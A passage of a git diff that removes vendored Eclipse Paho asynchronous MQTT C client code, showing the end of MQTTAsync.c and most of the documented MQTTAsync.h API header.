-{
-	int rc = MQTTASYNC_SUCCESS;
-	MQTTAsyncs* m = handle;
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m == NULL)
-	{
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-
-	/* First check unprocessed commands */
-	current = NULL;
-	while (ListNextElement(commands, &current))
-	{
-		MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)(current->content);
-
-		if (cmd->client == m && cmd->command.token == dt)
-			goto exit;
-	}
-
-	/* Now check the inflight messages */
-	if (m->c && m->c->outboundMsgs->count > 0)
-	{
-		current = NULL;
-		while (ListNextElement(m->c->outboundMsgs, &current))
-		{
-			Messages* m = (Messages*)(current->content);
-			if (m->msgid == dt)
-				goto exit;
-		}
-	}
-	rc = MQTTASYNC_TRUE; /* Can't find it, so it must be complete */
-
-exit:
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_waitForCompletion(MQTTAsync handle, MQTTAsync_token dt, unsigned long timeout)
-{
-	int rc = MQTTASYNC_FAILURE;
-	START_TIME_TYPE start = MQTTAsync_start_clock();
-	unsigned long elapsed = 0L;
-	MQTTAsyncs* m = handle;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m == NULL || m->c == NULL)
-	{
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-		rc = MQTTASYNC_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		MQTTAsync_unlock_mutex(mqttasync_mutex);
-		rc = MQTTASYNC_DISCONNECTED;
-		goto exit;
-	}
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-
-	if (MQTTAsync_isComplete(handle, dt) == 1)
-	{
-		rc = MQTTASYNC_SUCCESS; /* well we couldn't find it */
-		goto exit;
-	}
-
-	elapsed = MQTTAsync_elapsed(start);
-	while (elapsed < timeout)
-	{
-		MQTTAsync_sleep(100);
-		if (MQTTAsync_isComplete(handle, dt) == 1)
-		{
-			rc = MQTTASYNC_SUCCESS; /* well we couldn't find it */
-			goto exit;
-		}
-		elapsed = MQTTAsync_elapsed(start);
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-void MQTTAsync_setTraceLevel(enum MQTTASYNC_TRACE_LEVELS level)
-{
-	Log_setTraceLevel((enum LOG_LEVELS)level);
-}
-
-
-void MQTTAsync_setTraceCallback(MQTTAsync_traceCallback* callback)
-{
-	Log_setTraceCallback((Log_traceCallback*)callback);
-}
-
-
-MQTTAsync_nameValue* MQTTAsync_getVersionInfo(void)
-{
-	#define MAX_INFO_STRINGS 8
-	static MQTTAsync_nameValue libinfo[MAX_INFO_STRINGS + 1];
-	int i = 0;
-
-	libinfo[i].name = "Product name";
-	libinfo[i++].value = "Paho Asynchronous MQTT C Client Library";
-
-	libinfo[i].name = "Version";
-	libinfo[i++].value = CLIENT_VERSION;
-
-	libinfo[i].name = "Build level";
-	libinfo[i++].value = BUILD_TIMESTAMP;
-#if defined(OPENSSL)
-	libinfo[i].name = "OpenSSL version";
-	libinfo[i++].value = SSLeay_version(SSLEAY_VERSION);
-
-	libinfo[i].name = "OpenSSL flags";
-	libinfo[i++].value = SSLeay_version(SSLEAY_CFLAGS);
-
-	libinfo[i].name = "OpenSSL build timestamp";
-	libinfo[i++].value = SSLeay_version(SSLEAY_BUILT_ON);
-
-	libinfo[i].name = "OpenSSL platform";
-	libinfo[i++].value = SSLeay_version(SSLEAY_PLATFORM);
-
-	libinfo[i].name = "OpenSSL directory";
-	libinfo[i++].value = SSLeay_version(SSLEAY_DIR);
-#endif
-	libinfo[i].name = NULL;
-	libinfo[i].value = NULL;
-	return libinfo;
-}
diff --git a/thirdparty/paho.mqtt.c/src/MQTTAsync.h b/thirdparty/paho.mqtt.c/src/MQTTAsync.h
deleted file mode 100644
index e124b9e..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTAsync.h
+++ /dev/null
@@ -1,1728 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation
- *    Ian Craggs, Allan Stockdill-Mander - SSL connections
- *    Ian Craggs - multiple server connection support
- *    Ian Craggs - MQTT 3.1.1 support
- *    Ian Craggs - fix for bug 444103 - success/failure callbacks not invoked
- *    Ian Craggs - automatic reconnect and offline buffering (send while disconnected)
- *    Ian Craggs - binary will message
- *    Ian Craggs - binary password
- *    Ian Craggs - remove const on eyecatchers #168
- *******************************************************************************/
-
-/********************************************************************/
-
-/**
- * @cond MQTTAsync_main
- * @mainpage Asynchronous MQTT client library for C
- *
- * &copy; Copyright IBM Corp. 2009, 2017
- *
- * @brief An Asynchronous MQTT client library for C.
- *
- * An MQTT client application connects to MQTT-capable servers.
- * A typical client is responsible for collecting information from a telemetry
- * device and publishing the information to the server. It can also subscribe
- * to topics, receive messages, and use this information to control the
- * telemetry device.
- *
- * MQTT clients implement the published MQTT v3 protocol. You can write your own
- * API to the MQTT protocol using the programming language and platform of your
- * choice. This can be time-consuming and error-prone.
- *
- * To simplify writing MQTT client applications, this library encapsulates
- * the MQTT v3 protocol for you. Using this library enables a fully functional
- * MQTT client application to be written in a few lines of code.
- * The information presented here documents the API provided
- * by the Asynchronous MQTT Client library for C.
- *
- * <b>Using the client</b><br>
- * Applications that use the client library typically use a similar structure:
- * <ul>
- * <li>Create a client object</li>
- * <li>Set the options to connect to an MQTT server</li>
- * <li>Set up callback functions</li>
- * <li>Connect the client to an MQTT server</li>
- * <li>Subscribe to any topics the client needs to receive</li>
- * <li>Repeat until finished:</li>
- *     <ul>
- *     <li>Publish any messages the client needs to</li>
- *     <li>Handle any incoming messages</li>
- *     </ul>
- * <li>Disconnect the client</li>
- * <li>Free any memory being used by the client</li>
- * </ul>
- * Some simple examples are shown here:
- * <ul>
- * <li>@ref publish</li>
- * <li>@ref subscribe</li>
- * </ul>
- * Additional information about important concepts is provided here:
- * <ul>
- * <li>@ref async</li>
- * <li>@ref wildcard</li>
- * <li>@ref qos</li>
- * <li>@ref tracing</li>
- * <li>@ref auto_reconnect</li>
- * <li>@ref offline_publish</li>
- * </ul>
- * @endcond
- */
-
-
-/*
-/// @cond EXCLUDE
-*/
-#if defined(__cplusplus)
- extern "C" {
-#endif
-
-#if !defined(MQTTASYNC_H)
-#define MQTTASYNC_H
-
-#if defined(WIN32) || defined(WIN64)
-  #define DLLImport __declspec(dllimport)
-  #define DLLExport __declspec(dllexport)
-#else
-  #define DLLImport extern
-  #define DLLExport  __attribute__ ((visibility ("default")))
-#endif
-
-#include <stdio.h>
-/*
-/// @endcond
-*/
-
-#if !defined(NO_PERSISTENCE)
-#include "MQTTClientPersistence.h"
-#endif
-
-/**
- * Return code: No error. Indicates successful completion of an MQTT client
- * operation.
- */
-#define MQTTASYNC_SUCCESS 0
-/**
- * Return code: A generic error code indicating the failure of an MQTT client
- * operation.
- */
-#define MQTTASYNC_FAILURE -1
-
-/* error code -2 is MQTTAsync_PERSISTENCE_ERROR */
-
-#define MQTTASYNC_PERSISTENCE_ERROR -2
-
-/**
- * Return code: The client is disconnected.
- */
-#define MQTTASYNC_DISCONNECTED -3
-/**
- * Return code: The maximum number of messages allowed to be simultaneously
- * in-flight has been reached.
- */
-#define MQTTASYNC_MAX_MESSAGES_INFLIGHT -4
-/**
- * Return code: An invalid UTF-8 string has been detected.
- */
-#define MQTTASYNC_BAD_UTF8_STRING -5
-/**
- * Return code: A NULL parameter has been supplied when this is invalid.
- */
-#define MQTTASYNC_NULL_PARAMETER -6
-/**
- * Return code: The topic has been truncated (the topic string includes
- * embedded NULL characters). String functions will not access the full topic.
- * Use the topic length value to access the full topic.
- */
-#define MQTTASYNC_TOPICNAME_TRUNCATED -7
-/**
- * Return code: A structure parameter does not have the correct eyecatcher
- * and version number.
- */
-#define MQTTASYNC_BAD_STRUCTURE -8
-/**
- * Return code: A qos parameter is not 0, 1 or 2
- */
-#define MQTTASYNC_BAD_QOS -9
-/**
- * Return code: All 65535 MQTT msgids are being used
- */
-#define MQTTASYNC_NO_MORE_MSGIDS -10
-/**
- * Return code: the request is being discarded when not complete
- */
-#define MQTTASYNC_OPERATION_INCOMPLETE -11
-/**
- * Return code: no more messages can be buffered
- */
-#define MQTTASYNC_MAX_BUFFERED_MESSAGES -12
-/**
- * Return code: Attempting SSL connection using non-SSL version of library
- */
-#define MQTTASYNC_SSL_NOT_SUPPORTED -13
-
-/**
- * Default MQTT version to connect with.  Use 3.1.1 then fall back to 3.1
- */
-#define MQTTVERSION_DEFAULT 0
-/**
- * MQTT version to connect with: 3.1
- */
-#define MQTTVERSION_3_1 3
-/**
- * MQTT version to connect with: 3.1.1
- */
-#define MQTTVERSION_3_1_1 4
-/**
- * Bad return code from subscribe, as defined in the 3.1.1 specification
- */
-#define MQTT_BAD_SUBSCRIBE 0x80
-
-
-/**
- *  Initialization options
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  Must be MQTG. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/** 1 = we do openssl init, 0 = leave it to the application */
-	int do_openssl_init;
-} MQTTAsync_init_options;
-
-#define MQTTAsync_init_options_initializer { {'M', 'Q', 'T', 'G'}, 0, 0 }
-
-/**
- * Global init of mqtt library. Call once on program start to set global behaviour.
- * handle_openssl_init - if mqtt library should handle openssl init (1) or rely on the caller to init it before using mqtt (0)
- */
-DLLExport void MQTTAsync_global_init(MQTTAsync_init_options* inits);
-
-/**
- * A handle representing an MQTT client. A valid client handle is available
- * following a successful call to MQTTAsync_create().
- */
-typedef void* MQTTAsync;
-/**
- * A value representing an MQTT message. A token is returned to the
- * client application when a message is published. The token can then be used to
- * check that the message was successfully delivered to its destination (see
- * MQTTAsync_publish(),
- * MQTTAsync_publishMessage(),
- * MQTTAsync_deliveryComplete(), and
- * MQTTAsync_getPendingTokens()).
- */
-typedef int MQTTAsync_token;
-
-/**
- * A structure representing the payload and attributes of an MQTT message. The
- * message topic is not part of this structure (see MQTTAsync_publishMessage(),
- * MQTTAsync_publish(), MQTTAsync_receive(), MQTTAsync_freeMessage()
- * and MQTTAsync_messageArrived()).
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTM. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/** The length of the MQTT message payload in bytes. */
-	int payloadlen;
-	/** A pointer to the payload of the MQTT message. */
-	void* payload;
-	/**
-     * The quality of service (QoS) assigned to the message.
-     * There are three levels of QoS:
-     * <DL>
-     * <DT><B>QoS0</B></DT>
-     * <DD>Fire and forget - the message may not be delivered</DD>
-     * <DT><B>QoS1</B></DT>
-     * <DD>At least once - the message will be delivered, but may be
-     * delivered more than once in some circumstances.</DD>
-     * <DT><B>QoS2</B></DT>
-     * <DD>Once and one only - the message will be delivered exactly once.</DD>
-     * </DL>
-     */
-	int qos;
-	/**
-     * The retained flag serves two purposes depending on whether the message
-     * it is associated with is being published or received.
-     *
-     * <b>retained = true</b><br>
-     * For messages being published, a true setting indicates that the MQTT
-     * server should retain a copy of the message. The message will then be
-     * transmitted to new subscribers to a topic that matches the message topic.
-     * For subscribers registering a new subscription, the flag being true
-     * indicates that the received message is not a new one, but one that has
-     * been retained by the MQTT server.
-     *
-     * <b>retained = false</b> <br>
-     * For publishers, this ndicates that this message should not be retained
-     * by the MQTT server. For subscribers, a false setting indicates this is
-     * a normal message, received as a result of it being published to the
-     * server.
-     */
-	int retained;
-	/**
-      * The dup flag indicates whether or not this message is a duplicate.
-      * It is only meaningful when receiving QoS1 messages. When true, the
-      * client application should take appropriate action to deal with the
-      * duplicate message.
-      */
-	int dup;
-	/** The message identifier is normally reserved for internal use by the
-      * MQTT client and server.
-      */
-	int msgid;
-} MQTTAsync_message;
-
-#define MQTTAsync_message_initializer { {'M', 'Q', 'T', 'M'}, 0, 0, NULL, 0, 0, 0, 0 }
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * receipt of messages. The function is registered with the client library by
- * passing it as an argument to MQTTAsync_setCallbacks(). It is
- * called by the client library when a new message that matches a client
- * subscription has been received from the server. This function is executed on
- * a separate thread to the one on which the client application is running.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTAsync_setCallbacks(), which contains any application-specific context.
- * @param topicName The topic associated with the received message.
- * @param topicLen The length of the topic if there are one
- * more NULL characters embedded in <i>topicName</i>, otherwise <i>topicLen</i>
- * is 0. If <i>topicLen</i> is 0, the value returned by <i>strlen(topicName)</i>
- * can be trusted. If <i>topicLen</i> is greater than 0, the full topic name
- * can be retrieved by accessing <i>topicName</i> as a byte array of length
- * <i>topicLen</i>.
- * @param message The MQTTAsync_message structure for the received message.
- * This structure contains the message payload and attributes.
- * @return This function must return a boolean value indicating whether or not
- * the message has been safely received by the client application. Returning
- * true indicates that the message has been successfully handled.
- * Returning false indicates that there was a problem. In this
- * case, the client library will reinvoke MQTTAsync_messageArrived() to
- * attempt to deliver the message to the application again.
- */
-typedef int MQTTAsync_messageArrived(void* context, char* topicName, int topicLen, MQTTAsync_message* message);
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of delivery of messages to the server. The function is
- * registered with the client library by passing it as an argument to MQTTAsync_setCallbacks().
- * It is called by the client library after the client application has
- * published a message to the server. It indicates that the necessary
- * handshaking and acknowledgements for the requested quality of service (see
- * MQTTAsync_message.qos) have been completed. This function is executed on a
- * separate thread to the one on which the client application is running.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTAsync_setCallbacks(), which contains any application-specific context.
- * @param token The ::MQTTAsync_token associated with
- * the published message. Applications can check that all messages have been
- * correctly published by matching the tokens returned from calls to
- * MQTTAsync_send() and MQTTAsync_sendMessage() with the tokens passed
- * to this callback.
- */
-typedef void MQTTAsync_deliveryComplete(void* context, MQTTAsync_token token);
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of the loss of connection to the server. The function is
- * registered with the client library by passing it as an argument to
- * MQTTAsync_setCallbacks(). It is called by the client library if the client
- * loses its connection to the server. The client application must take
- * appropriate action, such as trying to reconnect or reporting the problem.
- * This function is executed on a separate thread to the one on which the
- * client application is running.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTAsync_setCallbacks(), which contains any application-specific context.
- * @param cause The reason for the disconnection.
- * Currently, <i>cause</i> is always set to NULL.
- */
-typedef void MQTTAsync_connectionLost(void* context, char* cause);
-
-
-/**
- * This is a callback function, which will be called when the client
- * library successfully connects.  This is superfluous when the connection
- * is made in response to a MQTTAsync_connect call, because the onSuccess
- * callback can be used.  It is intended for use when automatic reconnect
- * is enabled, so that when a reconnection attempt succeeds in the background,
- * the application is notified and can take any required actions.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTAsync_setCallbacks(), which contains any application-specific context.
- * @param cause The reason for the disconnection.
- * Currently, <i>cause</i> is always set to NULL.
- */
-typedef void MQTTAsync_connected(void* context, char* cause);
-
-
-
-/** The data returned on completion of an unsuccessful API call in the response callback onFailure. */
-typedef struct
-{
-	/** A token identifying the failed request. */
-	MQTTAsync_token token;
-	/** A numeric code identifying the error. */
-	int code;
-	/** Optional text explaining the error. Can be NULL. */
-	const char *message;
-} MQTTAsync_failureData;
-
-/** The data returned on completion of a successful API call in the response callback onSuccess. */
-typedef struct
-{
-	/** A token identifying the successful request. Can be used to refer to the request later. */
-	MQTTAsync_token token;
-	/** A union of the different values that can be returned for subscribe, unsubscribe and publish. */
-	union
-	{
-		/** For subscribe, the granted QoS of the subscription returned by the server. */
-		int qos;
-		/** For subscribeMany, the list of granted QoSs of the subscriptions returned by the server. */
-		int* qosList;
-		/** For publish, the message being sent to the server. */
-		struct
-		{
-			MQTTAsync_message message;
-			char* destinationName;
-		} pub;
-		/* For connect, the server connected to, MQTT version used, and sessionPresent flag */
-		struct
-		{
-			char* serverURI;
-			int MQTTVersion;
-			int sessionPresent;
-		} connect;
-	} alt;
-} MQTTAsync_successData;
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of the successful completion of an API call. The function is
- * registered with the client library by passing it as an argument in
- * ::MQTTAsync_responseOptions.
- * @param context A pointer to the <i>context</i> value originally passed to
- * ::MQTTAsync_responseOptions, which contains any application-specific context.
- * @param response Any success data associated with the API completion.
- */
-typedef void MQTTAsync_onSuccess(void* context, MQTTAsync_successData* response);
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of the unsuccessful completion of an API call. The function is
- * registered with the client library by passing it as an argument in
- * ::MQTTAsync_responseOptions.
- * @param context A pointer to the <i>context</i> value originally passed to
- * ::MQTTAsync_responseOptions, which contains any application-specific context.
- * @param response Any failure data associated with the API completion.
- */
-typedef void MQTTAsync_onFailure(void* context,  MQTTAsync_failureData* response);
-
-typedef struct
-{
-	/** The eyecatcher for this structure.  Must be MQTR */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/**
-    * A pointer to a callback function to be called if the API call successfully
-    * completes.  Can be set to NULL, in which case no indication of successful
-    * completion will be received.
-    */
-	MQTTAsync_onSuccess* onSuccess;
-	/**
-    * A pointer to a callback function to be called if the API call fails.
-    * Can be set to NULL, in which case no indication of unsuccessful
-    * completion will be received.
-    */
-	MQTTAsync_onFailure* onFailure;
-	/**
-	* A pointer to any application-specific context. The
-    * the <i>context</i> pointer is passed to success or failure callback functions to
-    * provide access to the context information in the callback.
-    */
-	void* context;
-	MQTTAsync_token token;   /* output */
-} MQTTAsync_responseOptions;
-
-#define MQTTAsync_responseOptions_initializer { {'M', 'Q', 'T', 'R'}, 0, NULL, NULL, 0, 0 }
-
-
-/**
- * This function sets the global callback functions for a specific client.
- * If your client application doesn't use a particular callback, set the
- * relevant parameter to NULL. Any necessary message acknowledgements and
- * status communications are handled in the background without any intervention
- * from the client application.  If you do not set a messageArrived callback
- * function, you will not be notified of the receipt of any messages as a
- * result of a subscription.
- *
- * <b>Note:</b> The MQTT client must be disconnected when this function is
- * called.
- * @param handle A valid client handle from a successful call to
- * MQTTAsync_create().
- * @param context A pointer to any application-specific context. The
- * the <i>context</i> pointer is passed to each of the callback functions to
- * provide access to the context information in the callback.
- * @param cl A pointer to an MQTTAsync_connectionLost() callback
- * function. You can set this to NULL if your application doesn't handle
- * disconnections.
- * @param ma A pointer to an MQTTAsync_messageArrived() callback
- * function.  You can set this to NULL if your application doesn't handle
- * receipt of messages.
- * @param dc A pointer to an MQTTAsync_deliveryComplete() callback
- * function. You can set this to NULL if you do not want to check
- * for successful delivery.
- * @return ::MQTTASYNC_SUCCESS if the callbacks were correctly set,
- * ::MQTTASYNC_FAILURE if an error occurred.
- */
-DLLExport int MQTTAsync_setCallbacks(MQTTAsync handle, void* context, MQTTAsync_connectionLost* cl,
-									MQTTAsync_messageArrived* ma, MQTTAsync_deliveryComplete* dc);
-
-
-/**
- * Sets the MQTTAsync_connected() callback function for a client.
- * @param handle A valid client handle from a successful call to
- * MQTTAsync_create().
- * @param context A pointer to any application-specific context. The
- * the <i>context</i> pointer is passed to each of the callback functions to
- * provide access to the context information in the callback.
- * @param co A pointer to an MQTTAsync_connected() callback
- * function.  NULL removes the callback setting.
- * @return ::MQTTASYNC_SUCCESS if the callbacks were correctly set,
- * ::MQTTASYNC_FAILURE if an error occurred.
- */
-DLLExport int MQTTAsync_setConnected(MQTTAsync handle, void* context, MQTTAsync_connected* co);
-
-
-/**
- * Reconnects a client with the previously used connect options.  Connect
- * must have previously been called for this to work.
- * @param handle A valid client handle from a successful call to
- * MQTTAsync_create().
- * @return ::MQTTASYNC_SUCCESS if the callbacks were correctly set,
- * ::MQTTASYNC_FAILURE if an error occurred.
- */
-DLLExport int MQTTAsync_reconnect(MQTTAsync handle);
-
-
-/**
- * This function creates an MQTT client ready for connection to the
- * specified server and using the specified persistent storage (see
- * MQTTAsync_persistence). See also MQTTAsync_destroy().
- * @param handle A pointer to an ::MQTTAsync handle. The handle is
- * populated with a valid client reference following a successful return from
- * this function.
- * @param serverURI A null-terminated string specifying the server to
- * which the client will connect. It takes the form <i>protocol://host:port</i>.
- * <i>protocol</i> must be <i>tcp</i> or <i>ssl</i>. For <i>host</i>, you can
- * specify either an IP address or a host name. For instance, to connect to
- * a server running on the local machines with the default MQTT port, specify
- * <i>tcp://localhost:1883</i>.
- * @param clientId The client identifier passed to the server when the
- * client connects to it. It is a null-terminated UTF-8 encoded string.
- * @param persistence_type The type of persistence to be used by the client:
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_NONE: Use in-memory persistence. If the device or
- * system on which the client is running fails or is switched off, the current
- * state of any in-flight messages is lost and some messages may not be
- * delivered even at QoS1 and QoS2.
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_DEFAULT: Use the default (file system-based)
- * persistence mechanism. Status about in-flight messages is held in persistent
- * storage and provides some protection against message loss in the case of
- * unexpected failure.
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_USER: Use an application-specific persistence
- * implementation. Using this type of persistence gives control of the
- * persistence mechanism to the application. The application has to implement
- * the MQTTClient_persistence interface.
- * @param persistence_context If the application uses
- * ::MQTTCLIENT_PERSISTENCE_NONE persistence, this argument is unused and should
- * be set to NULL. For ::MQTTCLIENT_PERSISTENCE_DEFAULT persistence, it
- * should be set to the location of the persistence directory (if set
- * to NULL, the persistence directory used is the working directory).
- * Applications that use ::MQTTCLIENT_PERSISTENCE_USER persistence set this
- * argument to point to a valid MQTTClient_persistence structure.
- * @return ::MQTTASYNC_SUCCESS if the client is successfully created, otherwise
- * an error code is returned.
- */
-DLLExport int MQTTAsync_create(MQTTAsync* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context);
-
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQCO. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/** Whether to allow messages to be sent when the client library is not connected. */
-	int sendWhileDisconnected;
-	/** the maximum number of messages allowed to be buffered while not connected. */
-	int maxBufferedMessages;
-} MQTTAsync_createOptions;
-
-#define MQTTAsync_createOptions_initializer { {'M', 'Q', 'C', 'O'}, 0, 0, 100 }
-
-
-DLLExport int MQTTAsync_createWithOptions(MQTTAsync* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context, MQTTAsync_createOptions* options);
-
-/**
- * MQTTAsync_willOptions defines the MQTT "Last Will and Testament" (LWT) settings for
- * the client. In the event that a client unexpectedly loses its connection to
- * the server, the server publishes the LWT message to the LWT topic on
- * behalf of the client. This allows other clients (subscribed to the LWT topic)
- * to be made aware that the client has disconnected. To enable the LWT
- * function for a specific client, a valid pointer to an MQTTAsync_willOptions
- * structure is passed in the MQTTAsync_connectOptions structure used in the
- * MQTTAsync_connect() call that connects the client to the server. The pointer
- * to MQTTAsync_willOptions can be set to NULL if the LWT function is not
- * required.
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTW. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 or 1
-	    0 indicates no binary will message support
-	 */
-	int struct_version;
-	/** The LWT topic to which the LWT message will be published. */
-	const char* topicName;
-	/** The LWT payload. */
-	const char* message;
-	/**
-      * The retained flag for the LWT message (see MQTTAsync_message.retained).
-      */
-	int retained;
-	/**
-      * The quality of service setting for the LWT message (see
-      * MQTTAsync_message.qos and @ref qos).
-      */
-	int qos;
-  /** The LWT payload in binary form. This is only checked and used if the message option is NULL */
-	struct
-	{
-  	int len;            /**< binary payload length */
-		const void* data;  /**< binary payload data */
-	} payload;
-} MQTTAsync_willOptions;
-
-#define MQTTAsync_willOptions_initializer { {'M', 'Q', 'T', 'W'}, 1, NULL, NULL, 0, 0, { 0, NULL } }
-
-#define MQTT_SSL_VERSION_DEFAULT 0
-#define MQTT_SSL_VERSION_TLS_1_0 1
-#define MQTT_SSL_VERSION_TLS_1_1 2
-#define MQTT_SSL_VERSION_TLS_1_2 3
-
-/**
-* MQTTAsync_sslProperties defines the settings to establish an SSL/TLS connection using the
-* OpenSSL library. It covers the following scenarios:
-* - Server authentication: The client needs the digital certificate of the server. It is included
-*   in a store containting trusted material (also known as "trust store").
-* - Mutual authentication: Both client and server are authenticated during the SSL handshake. In
-*   addition to the digital certificate of the server in a trust store, the client will need its own
-*   digital certificate and the private key used to sign its digital certificate stored in a "key store".
-* - Anonymous connection: Both client and server do not get authenticated and no credentials are needed
-*   to establish an SSL connection. Note that this scenario is not fully secure since it is subject to
-*   man-in-the-middle attacks.
-*/
-typedef struct
-{
-	/** The eyecatcher for this structure.  Must be MQTS */
-	char struct_id[4];
-	/** The version number of this structure.    Must be 0, or 1 to enable TLS version selection. */
-	int struct_version;
-
-	/** The file in PEM format containing the public digital certificates trusted by the client. */
-	const char* trustStore;
-
-	/** The file in PEM format containing the public certificate chain of the client. It may also include
-	* the client's private key.
-	*/
-	const char* keyStore;
-
-	/** If not included in the sslKeyStore, this setting points to the file in PEM format containing
-	* the client's private key.
-	*/
-	const char* privateKey;
-	/** The password to load the client's privateKey if encrypted. */
-	const char* privateKeyPassword;
-
-	/**
-	* The list of cipher suites that the client will present to the server during the SSL handshake. For a
-	* full explanation of the cipher list format, please see the OpenSSL on-line documentation:
-	* http://www.openssl.org/docs/apps/ciphers.html#CIPHER_LIST_FORMAT
-	* If this setting is ommitted, its default value will be "ALL", that is, all the cipher suites -excluding
-	* those offering no encryption- will be considered.
-	* This setting can be used to set an SSL anonymous connection ("aNULL" string value, for instance).
-	*/
-	const char* enabledCipherSuites;
-
-    /** True/False option to enable verification of the server certificate **/
-    int enableServerCertAuth;
-
-    /** The SSL/TLS version to use. Specify one of MQTT_SSL_VERSION_DEFAULT (0),
-    * MQTT_SSL_VERSION_TLS_1_0 (1), MQTT_SSL_VERSION_TLS_1_1 (2) or MQTT_SSL_VERSION_TLS_1_2 (3).
-    * Only used if struct_version is >= 1.
-    */
-    int sslVersion;
-
-} MQTTAsync_SSLOptions;
-
-#define MQTTAsync_SSLOptions_initializer { {'M', 'Q', 'T', 'S'}, 1, NULL, NULL, NULL, NULL, NULL, 1, MQTT_SSL_VERSION_DEFAULT }
-
-/**
- * MQTTAsync_connectOptions defines several settings that control the way the
- * client connects to an MQTT server.  Default values are set in
- * MQTTAsync_connectOptions_initializer.
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTC. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0, 1, 2, 3 4 or 5.
-	  * 0 signifies no SSL options and no serverURIs
-	  * 1 signifies no serverURIs
-    * 2 signifies no MQTTVersion
-    * 3 signifies no automatic reconnect options
-    * 4 signifies no binary password option (just string)
-	  */
-	int struct_version;
-	/** The "keep alive" interval, measured in seconds, defines the maximum time
-      * that should pass without communication between the client and the server
-      * The client will ensure that at least one message travels across the
-      * network within each keep alive period.  In the absence of a data-related
-	  * message during the time period, the client sends a very small MQTT
-      * "ping" message, which the server will acknowledge. The keep alive
-      * interval enables the client to detect when the server is no longer
-	  * available without having to wait for the long TCP/IP timeout.
-	  * Set to 0 if you do not want any keep alive processing.
-	  */
-	int keepAliveInterval;
-	/**
-      * This is a boolean value. The cleansession setting controls the behaviour
-      * of both the client and the server at connection and disconnection time.
-      * The client and server both maintain session state information. This
-      * information is used to ensure "at least once" and "exactly once"
-      * delivery, and "exactly once" receipt of messages. Session state also
-      * includes subscriptions created by an MQTT client. You can choose to
-      * maintain or discard state information between sessions.
-      *
-      * When cleansession is true, the state information is discarded at
-      * connect and disconnect. Setting cleansession to false keeps the state
-      * information. When you connect an MQTT client application with
-      * MQTTAsync_connect(), the client identifies the connection using the
-      * client identifier and the address of the server. The server checks
-      * whether session information for this client
-      * has been saved from a previous connection to the server. If a previous
-      * session still exists, and cleansession=true, then the previous session
-      * information at the client and server is cleared. If cleansession=false,
-      * the previous session is resumed. If no previous session exists, a new
-      * session is started.
-	  */
-	int cleansession;
-	/**
-      * This controls how many messages can be in-flight simultaneously.
-	  */
-	int maxInflight;
-	/**
-      * This is a pointer to an MQTTAsync_willOptions structure. If your
-      * application does not make use of the Last Will and Testament feature,
-      * set this pointer to NULL.
-      */
-	MQTTAsync_willOptions* will;
-	/**
-      * MQTT servers that support the MQTT v3.1 protocol provide authentication
-      * and authorisation by user name and password. This is the user name
-      * parameter.
-      */
-	const char* username;
-	/**
-      * MQTT servers that support the MQTT v3.1 protocol provide authentication
-      * and authorisation by user name and password. This is the password
-      * parameter.
-      */
-	const char* password;
-	/**
-      * The time interval in seconds to allow a connect to complete.
-      */
-	int connectTimeout;
-	/**
-	 * The time interval in seconds
-	 */
-	int retryInterval;
-	/**
-      * This is a pointer to an MQTTAsync_SSLOptions structure. If your
-      * application does not make use of SSL, set this pointer to NULL.
-      */
-	MQTTAsync_SSLOptions* ssl;
-	/**
-      * A pointer to a callback function to be called if the connect successfully
-      * completes.  Can be set to NULL, in which case no indication of successful
-      * completion will be received.
-      */
-	MQTTAsync_onSuccess* onSuccess;
-	/**
-      * A pointer to a callback function to be called if the connect fails.
-      * Can be set to NULL, in which case no indication of unsuccessful
-      * completion will be received.
-      */
-	MQTTAsync_onFailure* onFailure;
-	/**
-	  * A pointer to any application-specific context. The
